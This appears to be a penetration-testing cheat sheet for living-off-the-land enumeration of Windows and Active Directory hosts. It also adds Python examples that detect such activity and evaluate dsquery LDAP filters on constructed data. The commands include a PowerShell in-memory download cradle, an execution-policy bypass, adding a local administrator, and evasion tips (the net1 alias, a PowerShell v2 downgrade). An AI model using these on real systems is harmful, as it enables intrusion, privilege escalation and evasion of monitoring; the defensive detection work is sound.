
Living Off the Land Enumeration

OS Context


Basic enum commands

| Command | Result |
|---|---|
| hostname | Prints the PC's name |
| [System.Environment]::OSVersion.Version | Prints out the OS version and revision level |
| wmic qfe get Caption,Description,HotFixID,InstalledOn | Prints the patches and hotfixes applied to the host |
| ipconfig /all | Prints out network adapter state and configurations |
| set | Displays a list of environment variables for the current session (run from a CMD prompt) |
| echo %USERDOMAIN% | Displays the domain name to which the host belongs (run from a CMD prompt) |
| echo %logonserver% | Prints out the name of the domain controller the host checks in with (run from a CMD prompt) |
systeminfo

Powershell


Get-Module
Get-ExecutionPolicy -List
Set-ExecutionPolicy Bypass -Scope Process
Get-ChildItem Env: | ft Key,Value
Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

OPSEC Techniques


powershell.exe -version 2

Checking Defenses


netsh advfirewall show allprofiles
sc query windefend
Get-MpComputerStatus

Other users on host?


qwinsta

Network Information


arp -a
ipconfig /all
route print

note

Using arp -a and route print will not only benefit in enumerating AD environments, but will also assist us in identifying opportunities to pivot to different network segments in any environment.

Windows Management Instrumentation (WMI)


wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
wmic process list /format:list
wmic ntdomain list /format:list
wmic useraccount list /format:list
wmic group list /format:list
wmic sysaccount list /format:list
https://gist.github.com/xorrior/67ee741af08cb1fc86511047550cdaf4

Net Commands


net accounts
net accounts /domain
net group /domain
net group "Domain Admins" /domain
net group "domain computers" /domain
net group "Domain Controllers" /domain
net group <domain_group_name> /domain
net groups /domain
List of domain groups
net localgroup
net localgroup administrators /domain
net localgroup Administrators
net localgroup administrators [username] /add
net share
net user <ACCOUNT_NAME> /domain
net user /domain
net user %username%
Information about the current user
net use x: \\computer\share
net view
net view /all /domain[:domainname]
Shares on the domains
net view /domain 

OPSEC

Typing net1 instead of net will execute the same functions without the potential trigger from the net string.
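Both OPSEC notes on this page (the net1 alias and the PowerShell version 2 downgrade) describe choices that a detection engineer wants to catch in process-creation telemetry. The following is an added example, not part of the original cheat sheet: it runs a few simple rules over constructed, simplified process-creation records (a pipe-separated form loosely modelled on Security 4688 / Sysmon Event ID 1 fields, not a real vendor format) and additionally raises a burst alert when one host/user pair runs several distinct enumeration binaries from this page within a short window. Field layout, rule names and the threshold are assumptions made for the example.

```python
"""Flag living-off-the-land enumeration in process-creation telemetry.

Added example (not from the original page). Assumptions:
- Records are constructed, simplified lines: "timestamp|host|user|parent|command_line".
- Rule names, the 5-minute window and the threshold of 5 binaries are illustrative.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Enumeration binaries listed on the cheat sheet. net1 is included because it
# runs the same functions as net.exe (see the OPSEC note above).
ENUM_BINARIES = {"net", "net1", "wmic", "dsquery", "qwinsta", "systeminfo", "netsh", "sc"}

# Per-event rules: each is worth a hit on its own.
RULES = {
    # net1 used in place of net (string-based evasion noted above)
    "net1_alias": re.compile(r"(^|[\\\s])net1(\.exe)?\s", re.I),
    # PowerShell forced to engine version 2 (no script block logging / AMSI)
    "ps_downgrade": re.compile(r"powershell(\.exe)?\b.*-v(ersion)?\s+2\b", re.I),
    # in-memory download cradle from the PowerShell section
    "download_cradle": re.compile(r"DownloadString|iex\s*\(", re.I),
    # querying the host's own defenses (Checking Defenses section)
    "defense_query": re.compile(
        r"(sc(\.exe)?\s+query\s+windefend|Get-MpComputerStatus|advfirewall\s+show)", re.I),
}

# Constructed sample telemetry (not real hosts or users).
SAMPLE_LOGS = [
    "2024-05-01T09:00:00|WS01|corp\\alice|explorer.exe|C:\\Windows\\System32\\notepad.exe",
    "2024-05-01T09:01:00|WS01|corp\\bob|cmd.exe|hostname",
    "2024-05-01T09:01:05|WS01|corp\\bob|cmd.exe|systeminfo",
    "2024-05-01T09:01:10|WS01|corp\\bob|cmd.exe|C:\\Windows\\System32\\wmic.exe qfe get Caption,Description,HotFixID,InstalledOn",
    "2024-05-01T09:01:20|WS01|corp\\bob|cmd.exe|net1 group \"Domain Admins\" /domain",
    "2024-05-01T09:01:30|WS01|corp\\bob|cmd.exe|qwinsta",
    "2024-05-01T09:01:40|WS01|corp\\bob|cmd.exe|sc query windefend",
    "2024-05-01T09:02:00|WS01|corp\\bob|cmd.exe|powershell.exe -version 2 -nop -c \"Get-ExecutionPolicy -List\"",
    "2024-05-01T10:30:00|WS02|corp\\carol|cmd.exe|ipconfig /all",
]


def parse_line(line):
    """Split one constructed record into its five fields."""
    ts, host, user, parent, cmd = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user,
            "parent": parent, "cmd": cmd}


def image_name(cmd):
    """Bare executable name from a command line: lowercase, no path, no .exe."""
    first = cmd.strip().split()[0].strip('"')
    name = first.rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def match_rules(event):
    """Names of the per-event rules that fire on this command line."""
    return [name for name, rx in RULES.items() if rx.search(event["cmd"])]


def analyze(lines, window=timedelta(minutes=5), threshold=5):
    """Return (per-event hits, burst alerts).

    hits:   list of (command_line, [rule names]) for events matching any rule.
    bursts: list of ((host, user), sorted binaries) where one actor ran at least
            `threshold` distinct enumeration binaries within `window`.
    """
    events = [parse_line(line) for line in lines]
    hits = []
    for e in events:
        matched = match_rules(e)
        if matched:
            hits.append((e["cmd"], matched))

    by_actor = defaultdict(list)
    for e in events:
        if image_name(e["cmd"]) in ENUM_BINARIES:
            by_actor[(e["host"], e["user"])].append(e)

    bursts = []
    for actor, evs in by_actor.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e["ts"] - start["ts"] <= window]
            distinct = {image_name(e["cmd"]) for e in in_window}
            if len(distinct) >= threshold:
                bursts.append((actor, sorted(distinct)))
                break
    return hits, bursts


if __name__ == "__main__":
    found_hits, found_bursts = analyze(SAMPLE_LOGS)
    for cmd, rules in found_hits:
        print("HIT", rules, cmd)
    for actor, binaries in found_bursts:
        print("BURST", actor, binaries)
```

The burst rule is deliberately keyed on distinct binaries rather than raw event count, because legitimate scripts often call the same tool many times while a hands-on-keyboard enumeration session walks through several different ones in quick succession.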

Dsquery


C:\Windows\System32\dsquery.dll

note

Elevated privs required for dsquery

dsquery user
dsquery computer
We can use a dsquery wildcard search to view all objects in an OU, for example.
dsquery * "CN=Users,DC=DOMAIN,DC=LOCAL"
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl
dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
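The two -filter expressions above rely on the LDAP extensible matching rule 1.2.840.113556.1.4.803 (LDAP_MATCHING_RULE_BIT_AND), which matches when every bit of the asserted value is set in the attribute; 32 is PASSWD_NOTREQD and 8192 is SERVER_TRUST_ACCOUNT (a domain controller's computer account). As an added example, not from the original page, the following evaluates those exact filter strings against constructed sample directory objects and decodes userAccountControl into flag names, so a reviewer can check what a given filter will return before running it. The objects, the minimal filter parser and the objectCategory values are assumptions for the example (real AD stores objectCategory as a DN and dsquery resolves the short form).

```python
"""Evaluate dsquery-style LDAP filters with the bitwise-AND/OR matching rules.

Added example (not from the original page). SAMPLE_OBJECTS are constructed,
not real accounts; the parser covers only &, |, !, equality and extensible
matches, which is enough for the filters shown on the page.
"""

BIT_AND = "1.2.840.113556.1.4.803"  # all asserted bits must be set
BIT_OR = "1.2.840.113556.1.4.804"   # any asserted bit may be set

# Subset of userAccountControl flags (values from the AD schema).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}

# The filters taken from the dsquery commands above.
PASSWD_NOTREQD_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=32))")
DC_FILTER = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"

# Constructed sample objects (objectCategory kept as its short form).
SAMPLE_OBJECTS = [
    {"sAMAccountName": "alice", "objectCategory": "person", "objectClass": "user",
     "userAccountControl": 0x200},
    {"sAMAccountName": "svc_backup", "objectCategory": "person", "objectClass": "user",
     "userAccountControl": 0x200 | 0x20 | 0x10000},
    {"sAMAccountName": "old_user", "objectCategory": "person", "objectClass": "user",
     "userAccountControl": 0x200 | 0x2},
    {"sAMAccountName": "DC01$", "objectCategory": "computer", "objectClass": "computer",
     "userAccountControl": 0x2000 | 0x80000},
    {"sAMAccountName": "WS01$", "objectCategory": "computer", "objectClass": "computer",
     "userAccountControl": 0x1000},
    {"sAMAccountName": "WS02$", "objectCategory": "computer", "objectClass": "computer",
     "userAccountControl": 0x1000 | 0x20},
]


def decode_uac(value):
    """Flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def parse_filter(text):
    """Parse an RFC 4515-style filter into a nested tuple tree."""
    node, pos = _parse(text, 0)
    if pos != len(text):
        raise ValueError("trailing data after filter")
    return node


def _parse(s, i):
    if s[i] != "(":
        raise ValueError("expected '(' at offset %d" % i)
    i += 1
    if s[i] in "&|":
        op, i, children = s[i], i + 1, []
        while s[i] == "(":
            child, i = _parse(s, i)
            children.append(child)
        if s[i] != ")":
            raise ValueError("expected ')' at offset %d" % i)
        return (op, children), i + 1
    if s[i] == "!":
        child, i = _parse(s, i + 1)
        if s[i] != ")":
            raise ValueError("expected ')' at offset %d" % i)
        return ("!", [child]), i + 1
    end = s.index(")", i)
    attr, value = s[i:end].split("=", 1)  # attr is "name:OID:" for extensible matches
    return ("=", attr, value), end + 1


def evaluate(node, obj):
    """True if the directory object satisfies the parsed filter."""
    fields = {k.lower(): v for k, v in obj.items()}
    kind = node[0]
    if kind == "&":
        return all(evaluate(c, obj) for c in node[1])
    if kind == "|":
        return any(evaluate(c, obj) for c in node[1])
    if kind == "!":
        return not evaluate(node[1][0], obj)
    _, attr, value = node
    if ":" in attr:
        name, oid, _ = attr.split(":")
        actual, mask = int(fields.get(name.lower(), 0)), int(value)
        if oid == BIT_AND:
            return (actual & mask) == mask
        if oid == BIT_OR:
            return (actual & mask) != 0
        raise ValueError("unsupported matching rule " + oid)
    return str(fields.get(attr.lower(), "")).lower() == value.lower()


def query(objects, filter_text):
    """Objects matching the filter, each annotated with decoded UAC flags."""
    node = parse_filter(filter_text)
    return [dict(o, flags=decode_uac(int(o.get("userAccountControl", 0))))
            for o in objects if evaluate(node, o)]


if __name__ == "__main__":
    for label, flt in (("PASSWD_NOTREQD users", PASSWD_NOTREQD_FILTER), ("domain controllers", DC_FILTER)):
        print(label)
        for o in query(SAMPLE_OBJECTS, flt):
            print("  ", o["sAMAccountName"], o["flags"])
```

Note that WS02$ also has PASSWD_NOTREQD set but is excluded by the first filter because of the objectCategory=person clause, which is why the page's user filter carries that prefix; dropping it would return computer accounts as well.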